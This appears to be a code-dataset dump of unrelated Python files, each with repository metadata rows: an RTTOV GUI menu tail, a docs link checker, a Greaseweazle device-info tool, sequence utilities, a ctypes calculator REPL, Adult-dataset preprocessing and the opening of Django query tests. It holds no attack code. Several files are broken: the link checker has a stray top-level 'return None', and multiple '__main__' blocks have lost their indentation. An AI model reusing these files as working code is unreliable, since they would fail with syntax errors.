                ("Add cloud", "add a cloud",
                 self.OnAddCloud, "Add cloud", True, False),
                ("Remove cloud", "remove a cloud",
                 self.OnRemoveCloud, "Remove cloud", True, False),
                ("Replace Aerosol by clim", "Replace Aerosol by clim",
                 self.OnReplaceAerosolByClim, "Replace Aerosol by clim",
                 True, False)),
               ("&Help",  # Help Menu
                ("About", "About screen", self.OnAbout, "about",
                 True, False),
                ("&Help", "Help", self.OnHelp, "help", True, False)))
    else:
        # read-only mode: only quit/about are available
        return(("&File",  # File Menu
                ('&Quit', 'Quit', self.OnQuit, "quit", True, False)),
               ("&Help",  # Help Menu
                ("About", "About screen", self.OnAbout, "about",
                 True, False)))
if __name__ == "__main__":
    # Smoke test: load a sample profile and launch the profile editor alone.
    print "version matplotlib :", matplotlib.__version__
    p = rmodel.project.Project()
    p.openProfile(p.config.ENV["RTTOV_GUI_PREFIX"] +
                  '/rttov_tests/cldaer101lev_allgas.H5', 1)
    ex = wx.App()
    myProfileView = ProfileView(None, p.myProfile)
    myProfileView.Bind(wx.EVT_MENU, myProfileView.OnApplyChange,
                       myProfileView.items['applyChange'])
    profile = myProfileView.GetProfile()
    print "P"
    print profile['P']
    print "T"
    print profile["T"]
    print "loop"
    ex.MainLoop()
| 40.722833 | 79 | 0.532712 |
c488103f0df8c94d2732af26d966a7a3a8c1a71f | 5,628 | py | Python | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | null | null | null | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | null | null | null | dev/find_missing_docs_links.py | HaoXiangQI/cortex | 394f369260072609e42833b180c01a0545be6de7 | [
"Apache-2.0"
] | 1 | 2021-05-25T03:49:14.000Z | 2021-05-25T03:49:14.000Z | # Copyright 2020 Cortex Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import os
import re
import asyncio
import aiohttp
# Resolve the repository layout relative to this script's real location.
script_path = os.path.realpath(__file__)
root = os.path.dirname(os.path.dirname(script_path))
docs_root = os.path.join(root, "docs")
# "--skip-http" disables the (slow, network-dependent) validation of
# external http(s) links.
skip_http = False
if len(sys.argv) == 2 and sys.argv[1] == "--skip-http":
    skip_http = True
def main():
    """Collect every link in the docs tree, validate them all, print failures."""
    link_infos = []
    for path in get_docs_file_paths():
        link_infos.extend(get_links_from_file(path))
    for problem in check_links(link_infos):
        print(problem)
def get_docs_file_paths():
    """Return the paths of every Markdown (.md) file under the docs tree."""
    paths = []
    for dirpath, _dirnames, filenames in os.walk(docs_root):
        paths.extend(
            os.path.join(dirpath, name)
            for name in filenames
            if name.endswith(".md")
        )
    return paths
# link_info is (src_file, line_number, original_link_text, target_file, header)
def get_links_from_file(file):
    """Extract markdown links from *file*.

    Returns a list of (src_file, line_number, link_text, target_file, header)
    tuples; target_file and header are None for http links and for link
    formats we do not recognize (those are reported later).
    """
    link_infos = []
    with open(file) as fh:
        for lineno, line in enumerate(fh, start=1):
            for link in re.findall(r"\]\((.+?)\)", line):
                if link.startswith("http"):
                    # external link: checked over the network later
                    link_infos.append((file, lineno, link, None, None))
                elif link.startswith("#"):
                    # same-file anchor
                    link_infos.append((file, lineno, link, file, link[1:]))
                elif link.endswith(".md"):
                    # plain cross-file link, no anchor
                    target = os.path.normpath(os.path.join(file, "..", link))
                    link_infos.append((file, lineno, link, target, None))
                elif ".md#" in link and len(link.split("#")) == 2:
                    # cross-file link with an anchor
                    base, anchor = link.split("#")
                    target = os.path.normpath(os.path.join(file, "..", base))
                    link_infos.append((file, lineno, link, target, anchor))
                else:
                    # unknown format; flagged as an error downstream
                    link_infos.append((file, lineno, link, None, None))
    return link_infos
def check_links(link_infos):
    """Validate local links synchronously, then (optionally) http links async.

    Returns a list of error strings.  If any local link is broken, the
    (slow) http checks are skipped entirely; they are also skipped when the
    --skip-http flag was given.
    """
    errors = []
    http_links = []
    for info in link_infos:
        src, lineno, text, target, header = info
        if text.startswith("http"):
            http_links.append(info)
        elif not target and not header:
            errors.append(err_str(src, lineno, text, "unknown link format"))
        else:
            problem = check_local_link(src, lineno, text, target, header)
            if problem:
                errors.append(problem)
    # fail fast if there are local link errors
    if errors:
        return errors
    if not skip_http:
        asyncio.get_event_loop().run_until_complete(
            check_all_http_links(http_links, errors)
        )
    return errors
async def check_all_http_links(http_link_infos, errors):
    """Check every distinct http link concurrently, appending failures to *errors*."""
    seen = set()
    async with aiohttp.ClientSession() as session:
        tasks = []
        for src, lineno, link, _target, _header in http_link_infos:
            # each URL is fetched only once, no matter how often it is linked
            if link in seen:
                continue
            seen.add(link)
            tasks.append(
                asyncio.ensure_future(
                    check_http_link(session, src, lineno, link, errors)
                )
            )
        await asyncio.gather(*tasks)
async def check_http_link(session, src_file, line_num, link, errors):
    """GET *link*, retrying timeouts up to 3 attempts; record non-200 or timeout."""
    attempts = 0
    while True:
        attempts += 1
        try:
            async with session.get(link, timeout=5) as resp:
                if resp.status != 200:
                    errors.append(
                        err_str(src_file, line_num, link,
                                f"http response code {resp.status}")
                    )
                return
        except asyncio.TimeoutError:
            # give up after the third timed-out attempt
            if attempts >= 3:
                errors.append(err_str(src_file, line_num, link, "http timeout"))
                return
def check_local_link(src_file, line_num, original_link_text, target_file, header):
    """Return an error string if the target file (or its header) is missing, else None."""
    if not os.path.isfile(target_file):
        return err_str(src_file, line_num, original_link_text, "file does not exist")
    if not header:
        return None
    # only heading lines ("# ...") can satisfy an anchor
    with open(target_file) as fh:
        for line in fh:
            if line.startswith("#") and header_matches(line, header):
                return None
    return err_str(src_file, line_num, original_link_text, "header does not exist")
return None
def header_matches(text, header):
    """True when every alphabetic word of *header* occurs in *text* (case-insensitive)."""
    words_in_text = set(re.findall(r"[a-zA-Z]+", text.lower()))
    return all(
        word in words_in_text
        for word in re.findall(r"[a-zA-Z]+", header.lower())
    )
def err_str(src_file, line_num, original_link_text, reason):
    """Format "path:line: link (reason)", trimming any cortexlabs/cortex/ prefix."""
    short_path = src_file.split("cortexlabs/cortex/")[-1]
    return "{}:{}: {} ({})".format(short_path, line_num, original_link_text, reason)
if __name__ == "__main__":
main()
| 31.441341 | 98 | 0.598792 |
3235386d341fc79419015b1149ed8c54476ff215 | 3,657 | py | Python | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | scripts/greaseweazle/tools/info.py | bocke/Greaseweazle | cd1a3ccf53836faaf3a28318a4af02ede9bd1b7b | [
"Unlicense"
] | null | null | null | # greaseweazle/tools/info.py
#
# Greaseweazle control script: Displat info about tools, firmware, and drive.
#
# Written & released by Keir Fraser <keir.xen@gmail.com>
#
# This is free and unencumbered software released into the public domain.
# See the file COPYING for more details, or visit <http://unlicense.org>.
description = "Display information about the Greaseweazle setup."
import requests, re
import sys, serial
from greaseweazle.tools import util
from greaseweazle import usb as USB
from greaseweazle import version
# Map (hw_model, hw_submodel) -> human-readable board name.
model_id = { 1: { 0: 'F1',
                  1: 'F1 Plus',
                  2: 'F1 Plus (Unbuffered)' },
             4: { 0: 'V4',
                  1: 'V4 Slim' },
             7: { 0: 'F7 v1',
                  1: 'F7 Plus (Ant Goffart, v1)',
                  2: 'F7 Lightning',
                  3: 'F7 v2',  # fixed: stray ')' in the display name
                  4: 'F7 Plus (Ant Goffart, v2)',
                  5: 'F7 Lightning Plus',
                  6: 'F7 Slim',
                  7: 'F7 v3 "Thunderbolt"' },
             8: { 0: 'Adafruit Floppy Generic' } }

# Map reported USB speed code -> description.
speed_id = { 0: 'Full Speed (12 Mbit/s)',
             1: 'High Speed (480 Mbit/s)' }
def print_info_line(name, value, tab=0):
    """Print "name: value" indented by *tab*, with the label padded to 12 columns."""
    label = (name + ':').ljust(12 - tab)
    print(''.ljust(tab) + label + value)
def latest_firmware():
    """Return (major, minor) of the newest published firmware release.

    Queries the GitHub releases API (5 s timeout); expects the release tag
    to look like "vX.Y".  Raises on network failure or an unparsable tag.
    """
    rsp = requests.get('https://api.github.com/repos/keirf/'
                       'greaseweazle-firmware/releases/latest', timeout=5)
    tag = rsp.json()['tag_name']
    r = re.match(r'v(\d+)\.(\d+)', tag)
    major, minor = int(r.group(1)), int(r.group(2))
    return major, minor
def main(argv):
    """Entry point for the `info` subcommand: print host/device details
    and, for devices running normal firmware, check for a newer release.

    :param argv: full argument vector; argv[1] is the subcommand name.
    """
    parser = util.ArgumentParser(usage='%(prog)s [options]')
    parser.add_argument("--device", help="device name (COM/serial port)")
    parser.add_argument("--bootloader", action="store_true",
                        help="display bootloader info (F7 only)")
    parser.description = description
    parser.prog += ' ' + argv[1]
    args = parser.parse_args(argv[2:])
    print_info_line('Host Tools', 'v%d.%d' % (version.major, version.minor))
    print('Device:')
    try:
        usb = util.usb_open(args.device, mode_check=False)
    except serial.SerialException:
        print('  Not found')
        sys.exit(0)
    # Temporarily switch firmware/bootloader mode if the requested view does
    # not match the device's current mode (only some models can do this).
    mode_switched = usb.can_mode_switch and usb.update_mode != args.bootloader
    if mode_switched:
        usb = util.usb_reopen(usb, args.bootloader)
    port = usb.port_info
    if port.device:
        print_info_line('Port', port.device, tab=2)
    try:
        model = model_id[usb.hw_model][usb.hw_submodel]
        # model 8 (Adafruit) already carries its own brand name
        if usb.hw_model != 8:
            model = 'Greaseweazle ' + model
    except KeyError:
        model = 'Unknown (0x%02X%02X)' % (usb.hw_model, usb.hw_submodel)
    print_info_line('Model', model, tab=2)
    fwver = 'v%d.%d' % (usb.major, usb.minor)
    if usb.update_mode:
        fwver += ' (Bootloader)'
    print_info_line('Firmware', fwver, tab=2)
    print_info_line('Serial', port.serial_number if port.serial_number
                    else 'Unknown', tab=2)
    try:
        speed = speed_id[usb.usb_speed]
    except KeyError:
        speed = 'Unknown (0x%02X)' % usb.usb_speed
    print_info_line('USB Rate', speed, tab=2)
    # remember the mode/version seen before switching back
    usb_update_mode, usb_version = usb.update_mode, usb.version
    if mode_switched:
        usb = util.usb_reopen(usb, not args.bootloader)
    if not usb_update_mode:
        latest_version = latest_firmware()
        if latest_version > usb_version:
            print('\n*** New firmware v%d.%d is available' % latest_version)
            util.print_update_instructions(usb)
if __name__ == "__main__":
main(sys.argv)
# Local variables:
# python-indent: 4
# End:
| 31.25641 | 78 | 0.596937 |
017718e3902e820e976a74ef906d07e4f46314c1 | 1,075 | py | Python | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | 1 | 2018-01-08T15:18:22.000Z | 2018-01-08T15:18:22.000Z | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | 1 | 2017-09-08T15:02:31.000Z | 2017-09-08T15:02:31.000Z | seqtools/basics.py | jason-weirather/py-seq-tools | f642c2c73ffef2acc83656a78059a476fc734ca1 | [
"Apache-2.0"
] | null | null | null | """Put generally useful things here"""
import re, sys
from cStringIO import StringIO
def is_uuid4(instr):
    """A validator to confirm a string is indeed a UUID4

    :param instr: input string that may be uuid4
    :type instr: String
    :return: true if it is in UUID4 format
    :rtype: bool
    """
    candidate = instr.strip().replace('-', '').lower()
    if len(candidate) != 32:
        return False
    if re.match('^[0-9a-f]+$', candidate) is None:
        return False
    # version nibble must be 4, variant nibble must be 8/9/a/b
    if candidate[12] != '4':
        return False
    if re.match('[89ab]', candidate[16]) is None:
        return False
    return True
class Capturing(list):
    """List subclass that records lines printed to stdout inside a `with` block.

    Usage::

        with Capturing() as output:
            do_stuff_that_goes_to_stdout()

    Adapted from
    http://stackoverflow.com/questions/16571150/how-to-capture-stdout-output-from-a-python-function-call
    """
    def __enter__(self):
        # swap stdout for an in-memory buffer, remembering the real stream
        self._cache = sys.stdout
        sys.stdout = self._output = StringIO()
        return self
    def __exit__(self, *exc_info):
        captured = self._output.getvalue()
        self.extend(captured.splitlines())
        del self._output
        sys.stdout = self._cache
dcbbedfab5b0f03d02251875e1f27bb766d42f51 | 983 | py | Python | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 22 | 2021-11-11T23:23:50.000Z | 2022-03-28T05:44:59.000Z | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 19 | 2021-11-12T03:51:06.000Z | 2022-03-31T20:06:26.000Z | example/example.py | quil-lang/sbcl-librarian | 51df62ea1cda032aeae15b44b1983cd70b4234ee | [
"MIT"
] | 7 | 2021-11-12T02:22:06.000Z | 2022-03-16T13:57:43.000Z | from ctypes import *
import libcalc
import sys
def die(msg):
    """Print *msg* and terminate the process with exit status 1.

    Uses sys.exit rather than the builtin exit(): the builtin is injected by
    the site module and is not guaranteed to exist (e.g. under `python -S`
    or in frozen executables).
    """
    print(msg)
    sys.exit(1)
if __name__ == '__main__':
    # Simple REPL: read an expression, parse it via the libcalc FFI,
    # simplify it (or only strip zero terms when invoked with the
    # "remove-zeros" argument), and print the result.
    while True:
        print("> ", end='')
        try:
            s = input()
        except EOFError:
            # Ctrl-D ends the session cleanly
            sys.exit(0)
        expr = libcalc.expr_type()
        if (libcalc.calc_parse(s.encode('utf-8'), byref(expr)) != 0):
            die("unable to parse expression")
        simplified = libcalc.expr_type()
        if (len(sys.argv) == 2 and sys.argv[1] == 'remove-zeros'):
            libcalc.calc_remove_zeros(expr, byref(simplified))
        else:
            libcalc.calc_simplify(expr, byref(simplified))
        result = c_char_p()
        if (libcalc.calc_expression_to_string(simplified, byref(result)) != 0):
            die("unable to print expression to string")
        print('')
        print(result.value.decode('utf-8'))
        print('')
        # Handles are owned by the Lisp runtime; release them every
        # iteration to avoid leaking.
        libcalc.lisp_release_handle(expr)
        libcalc.lisp_release_handle(simplified)
bffdae3c81375b829efd636ec763df9e9d471da9 | 1,200 | py | Python | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | 1 | 2020-03-04T02:41:25.000Z | 2020-03-04T02:41:25.000Z | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | null | null | null | Classification on Adults Dataset/preprocess.py | cxy1997/SJTU-CS245-Data-Science | 882e3ae0b6b5595e34a59cca890ba8388ff2cfd0 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import sklearn.preprocessing as preprocessing
NORM = True
# Data preprocessing
def encode(df):
    """One-hot encode the feature columns of *df* (every column except the
    label column '收入' / income).

    Object (string) columns are label-encoded then one-hot encoded; numeric
    columns pass through unchanged.  Returns a 2-D array whose rows align
    with *df*.  Unlike the original, the output shape is derived from the
    data instead of being hard-coded to the Adult test set (16281 x 108).
    """
    encoded_columns = []
    for column in df.columns:
        if column == '收入':  # target column; excluded from the features
            continue
        # `np.object` was removed in NumPy 1.24; compare against `object`.
        if df.dtypes[column] == object:
            labels = preprocessing.LabelEncoder().fit_transform(df[column])
            # NOTE(review): `sparse=` was renamed `sparse_output=` in
            # scikit-learn 1.2 -- update when bumping the dependency.
            onehot = preprocessing.OneHotEncoder(sparse=False).fit_transform(
                labels.reshape(-1, 1))
            encoded_columns.append(onehot)
        else:
            encoded_columns.append(df[column].values.reshape(-1, 1))
    return np.hstack(encoded_columns)
# Data standardization
def normalize(x):
    """Standardize columns to zero mean and (roughly) unit variance.

    Columns whose standard deviation is below 1 are divided by 1 instead,
    which avoids division by zero for constant columns and leaves
    near-constant columns un-amplified.
    """
    mean = np.mean(x, axis=0)
    std = np.std(x, axis=0)
    std = np.where(std < 1, 1, std)
    return (x - mean) / std
# Column names of the UCI Adult dataset (in Chinese; the last column,
# '收入' = income, is the classification label).
headers = ['年龄', '工作类别', '最终权重', '教育程度', '受教育时间', '婚姻状况', '职业', '家庭关系', '种族', '性别', '资本收益', '资本亏损', '每周工作小时数', '祖国', '收入']
df = pd.read_csv('adult.txt', names = headers)
result = encode(df)
if NORM:
    result = normalize(result)
# Persist features and labels separately for the downstream classifiers.
np.save('adult_data.npy', result)
np.save('adult_label.npy', df['收入'].values.reshape(-1))
ca982b9c6a32fd7bfa8520cddd7d854983e6dc8c | 168,365 | py | Python | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 5 | 2021-11-08T13:23:05.000Z | 2022-01-08T09:14:23.000Z | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 3 | 2020-01-21T17:58:28.000Z | 2022-03-30T14:16:15.000Z | tests/queries/tests.py | Mr-Destructive/django | d3a64bea51676fcf8a0ae593cf7b103939e12c87 | [
"BSD-3-Clause",
"0BSD"
] | 1 | 2021-04-15T01:05:57.000Z | 2021-04-15T01:05:57.000Z | import datetime
import pickle
import sys
import unittest
from operator import attrgetter
from threading import Lock
from django.core.exceptions import EmptyResultSet, FieldError
from django.db import DEFAULT_DB_ALIAS, connection
from django.db.models import Count, Exists, F, Max, OuterRef, Q
from django.db.models.expressions import RawSQL
from django.db.models.sql.constants import LOUTER
from django.db.models.sql.where import NothingNode, WhereNode
from django.test import SimpleTestCase, TestCase, skipUnlessDBFeature
from django.test.utils import CaptureQueriesContext
from .models import (
FK1, Annotation, Article, Author, BaseA, Book, CategoryItem,
CategoryRelationship, Celebrity, Channel, Chapter, Child, ChildObjectA,
Classroom, CommonMixedCaseForeignKeys, Company, Cover, CustomPk,
CustomPkTag, DateTimePK, Detail, DumbCategory, Eaten, Employment,
ExtraInfo, Fan, Food, Identifier, Individual, Item, Job,
JobResponsibilities, Join, LeafA, LeafB, LoopX, LoopZ, ManagedModel,
Member, MixedCaseDbColumnCategoryItem, MixedCaseFieldCategoryItem, ModelA,
ModelB, ModelC, ModelD, MyObject, NamedCategory, Node, Note, NullableName,
Number, ObjectA, ObjectB, ObjectC, OneToOneCategory, Order, OrderItem,
Page, Paragraph, Person, Plaything, PointerA, Program, ProxyCategory,
ProxyObjectA, ProxyObjectB, Ranking, Related, RelatedIndividual,
RelatedObject, Report, ReportComment, ReservedName, Responsibility, School,
SharedConnection, SimpleCategory, SingleObject, SpecialCategory, Staff,
StaffUser, Student, Tag, Task, Teacher, Ticket21203Child,
Ticket21203Parent, Ticket23605A, Ticket23605B, Ticket23605C, TvChef, Valid,
X,
)
class Queries1Tests(TestCase):
@classmethod
def setUpTestData(cls):
    """Shared fixture: a tag tree (t1..t5), notes, authors, items with
    m2m tags, reports, a ranking and covers, used by every test below."""
    cls.nc1 = generic = NamedCategory.objects.create(name="Generic")
    cls.t1 = Tag.objects.create(name='t1', category=generic)
    cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
    cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
    cls.t4 = Tag.objects.create(name='t4', parent=cls.t3)
    cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
    cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
    cls.n2 = Note.objects.create(note='n2', misc='bar', id=2)
    cls.n3 = Note.objects.create(note='n3', misc='foo', id=3, negate=False)
    cls.ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
    cls.ann1.notes.add(cls.n1)
    ann2 = Annotation.objects.create(name='a2', tag=cls.t4)
    ann2.notes.add(cls.n2, cls.n3)
    # Create these out of order so that sorting by 'id' will be different to sorting
    # by 'info'. Helps detect some problems later.
    cls.e2 = ExtraInfo.objects.create(info='e2', note=cls.n2, value=41, filterable=False)
    e1 = ExtraInfo.objects.create(info='e1', note=cls.n1, value=42)
    cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
    cls.a2 = Author.objects.create(name='a2', num=2002, extra=e1)
    cls.a3 = Author.objects.create(name='a3', num=3003, extra=cls.e2)
    cls.a4 = Author.objects.create(name='a4', num=4004, extra=cls.e2)
    cls.time1 = datetime.datetime(2007, 12, 19, 22, 25, 0)
    cls.time2 = datetime.datetime(2007, 12, 19, 21, 0, 0)
    time3 = datetime.datetime(2007, 12, 20, 22, 25, 0)
    time4 = datetime.datetime(2007, 12, 20, 21, 0, 0)
    cls.i1 = Item.objects.create(name='one', created=cls.time1, modified=cls.time1, creator=cls.a1, note=cls.n3)
    cls.i1.tags.set([cls.t1, cls.t2])
    cls.i2 = Item.objects.create(name='two', created=cls.time2, creator=cls.a2, note=cls.n2)
    cls.i2.tags.set([cls.t1, cls.t3])
    cls.i3 = Item.objects.create(name='three', created=time3, creator=cls.a2, note=cls.n3)
    cls.i4 = Item.objects.create(name='four', created=time4, creator=cls.a4, note=cls.n3)
    cls.i4.tags.set([cls.t4])
    cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
    cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
    cls.r3 = Report.objects.create(name='r3')
    # Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the Meta.ordering
    # will be rank3, rank2, rank1.
    cls.rank1 = Ranking.objects.create(rank=2, author=cls.a2)
    cls.c1 = Cover.objects.create(title="first", item=cls.i4)
    cls.c2 = Cover.objects.create(title="second", item=cls.i2)
def test_subquery_condition(self):
    """Nested subqueries receive distinct aliases (T, U, V) and reuse them
    instead of allocating new ones when a subquery is repeated."""
    qs1 = Tag.objects.filter(pk__lte=0)
    qs2 = Tag.objects.filter(parent__in=qs1)
    qs3 = Tag.objects.filter(parent__in=qs2)
    self.assertEqual(qs3.query.subq_aliases, {'T', 'U', 'V'})
    self.assertIn('v0', str(qs3.query).lower())
    qs4 = qs3.filter(parent__in=qs1)
    self.assertEqual(qs4.query.subq_aliases, {'T', 'U', 'V'})
    # It is possible to reuse U for the second subquery, no need to use W.
    self.assertNotIn('w0', str(qs4.query).lower())
    # So, 'U0."id"' is referenced in SELECT and WHERE twice.
    self.assertEqual(str(qs4.query).lower().count('u0.'), 4)
def test_ticket1050(self):
    """isnull=True on a m2m relation (and its id) matches items with no tags."""
    self.assertSequenceEqual(
        Item.objects.filter(tags__isnull=True),
        [self.i3],
    )
    self.assertSequenceEqual(
        Item.objects.filter(tags__id__isnull=True),
        [self.i3],
    )
def test_ticket1801(self):
self.assertSequenceEqual(
Author.objects.filter(item=self.i2),
[self.a2],
)
self.assertSequenceEqual(
Author.objects.filter(item=self.i3),
[self.a2],
)
self.assertSequenceEqual(
Author.objects.filter(item=self.i2) & Author.objects.filter(item=self.i3),
[self.a2],
)
def test_ticket2306(self):
# Checking that no join types are "left outer" joins.
query = Item.objects.filter(tags=self.t2).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).order_by('name'),
[self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(tags=self.t2)),
[self.i1],
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1)).filter(Q(creator__name='fred') | Q(tags=self.t2)),
[self.i1],
)
# Each filter call is processed "at once" against a single table, so this is
# different from the previous example as it tries to find tags that are two
# things at once (rather than two tags).
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1) & Q(tags=self.t2)),
[]
)
self.assertSequenceEqual(
Item.objects.filter(Q(tags=self.t1), Q(creator__name='fred') | Q(tags=self.t2)),
[]
)
qs = Author.objects.filter(ranking__rank=2, ranking__id=self.rank1.id)
self.assertSequenceEqual(list(qs), [self.a2])
self.assertEqual(2, qs.query.count_active_tables(), 2)
qs = Author.objects.filter(ranking__rank=2).filter(ranking__id=self.rank1.id)
self.assertEqual(qs.query.count_active_tables(), 3)
def test_ticket4464(self):
self.assertSequenceEqual(
Item.objects.filter(tags=self.t1).filter(tags=self.t2),
[self.i1],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name'),
[self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).filter(tags=self.t3),
[self.i2],
)
# Make sure .distinct() works with slicing (this was broken in Oracle).
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).order_by('name')[:3],
[self.i1, self.i1, self.i2],
)
self.assertSequenceEqual(
Item.objects.filter(tags__in=[self.t1, self.t2]).distinct().order_by('name')[:3],
[self.i1, self.i2],
)
def test_tickets_2080_3592(self):
self.assertSequenceEqual(
Author.objects.filter(item__name='one') | Author.objects.filter(name='a3'),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(item__name='one') | Q(name='a3')),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(name='a3') | Q(item__name='one')),
[self.a1, self.a3],
)
self.assertSequenceEqual(
Author.objects.filter(Q(item__name='three') | Q(report__name='r3')),
[self.a2],
)
def test_ticket6074(self):
# Merging two empty result sets shouldn't leave a queryset with no constraints
# (which would match everything).
self.assertSequenceEqual(Author.objects.filter(Q(id__in=[])), [])
self.assertSequenceEqual(
Author.objects.filter(Q(id__in=[]) | Q(id__in=[])),
[]
)
def test_tickets_1878_2939(self):
self.assertEqual(Item.objects.values('creator').distinct().count(), 3)
# Create something with a duplicate 'name' so that we can test multi-column
# cases (which require some tricky SQL transformations under the covers).
xx = Item(name='four', created=self.time1, creator=self.a2, note=self.n1)
xx.save()
self.assertEqual(
Item.objects.exclude(name='two').values('creator', 'name').distinct().count(),
4
)
self.assertEqual(
(
Item.objects
.exclude(name='two')
.extra(select={'foo': '%s'}, select_params=(1,))
.values('creator', 'name', 'foo')
.distinct()
.count()
),
4
)
self.assertEqual(
(
Item.objects
.exclude(name='two')
.extra(select={'foo': '%s'}, select_params=(1,))
.values('creator', 'name')
.distinct()
.count()
),
4
)
xx.delete()
def test_ticket7323(self):
self.assertEqual(Item.objects.values('creator', 'name').count(), 4)
def test_ticket2253(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
self.assertSequenceEqual(q1, [self.i4, self.i1, self.i3, self.i2])
self.assertSequenceEqual(q2, [self.i1])
self.assertSequenceEqual(
(q1 | q2).order_by('name'),
[self.i4, self.i1, self.i3, self.i2],
)
self.assertSequenceEqual((q1 & q2).order_by('name'), [self.i1])
q1 = Item.objects.filter(tags=self.t1)
q2 = Item.objects.filter(note=self.n3, tags=self.t2)
q3 = Item.objects.filter(creator=self.a4)
self.assertSequenceEqual(
((q1 & q2) | q3).order_by('name'),
[self.i4, self.i1],
)
def test_order_by_tables(self):
q1 = Item.objects.order_by('name')
q2 = Item.objects.filter(id=self.i1.id)
list(q2)
combined_query = (q1 & q2).order_by('name').query
self.assertEqual(len([
t for t in combined_query.alias_map if combined_query.alias_refcount[t]
]), 1)
def test_order_by_join_unref(self):
    """
    This test is related to the above one, testing that there aren't
    old JOINs in the query.
    """
    qs = Celebrity.objects.order_by('greatest_fan__fan_of')
    self.assertIn('OUTER JOIN', str(qs.query))
    # replacing the ordering must drop the now-unreferenced join
    qs = qs.order_by('id')
    self.assertNotIn('OUTER JOIN', str(qs.query))
def test_get_clears_ordering(self):
    """
    get() should clear ordering for optimization purposes.
    """
    with CaptureQueriesContext(connection) as captured_queries:
        Author.objects.order_by('name').get(pk=self.a1.pk)
    # the emitted SQL must not contain an ORDER BY clause
    self.assertNotIn('order by', captured_queries[0]['sql'].lower())
def test_tickets_4088_4306(self):
self.assertSequenceEqual(Report.objects.filter(creator=1001), [self.r1])
self.assertSequenceEqual(
Report.objects.filter(creator__num=1001),
[self.r1]
)
self.assertSequenceEqual(Report.objects.filter(creator__id=1001), [])
self.assertSequenceEqual(
Report.objects.filter(creator__id=self.a1.id),
[self.r1]
)
self.assertSequenceEqual(
Report.objects.filter(creator__name='a1'),
[self.r1]
)
def test_ticket4510(self):
self.assertSequenceEqual(
Author.objects.filter(report__name='r1'),
[self.a1],
)
def test_ticket7378(self):
self.assertSequenceEqual(self.a1.report_set.all(), [self.r1])
def test_tickets_5324_6704(self):
self.assertSequenceEqual(
Item.objects.filter(tags__name='t4'),
[self.i4],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct(),
[self.i1, self.i3, self.i2],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t4').order_by('name').distinct().reverse(),
[self.i2, self.i3, self.i1],
)
self.assertSequenceEqual(
Author.objects.exclude(item__name='one').distinct().order_by('name'),
[self.a2, self.a3, self.a4],
)
# Excluding across a m2m relation when there is more than one related
# object associated was problematic.
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t1').order_by('name'),
[self.i4, self.i3],
)
self.assertSequenceEqual(
Item.objects.exclude(tags__name='t1').exclude(tags__name='t4'),
[self.i3],
)
# Excluding from a relation that cannot be NULL should not use outer joins.
query = Item.objects.exclude(creator__in=[self.a1, self.a2]).query
self.assertNotIn(LOUTER, [x.join_type for x in query.alias_map.values()])
# Similarly, when one of the joins cannot possibly, ever, involve NULL
# values (Author -> ExtraInfo, in the following), it should never be
# promoted to a left outer join. So the following query should only
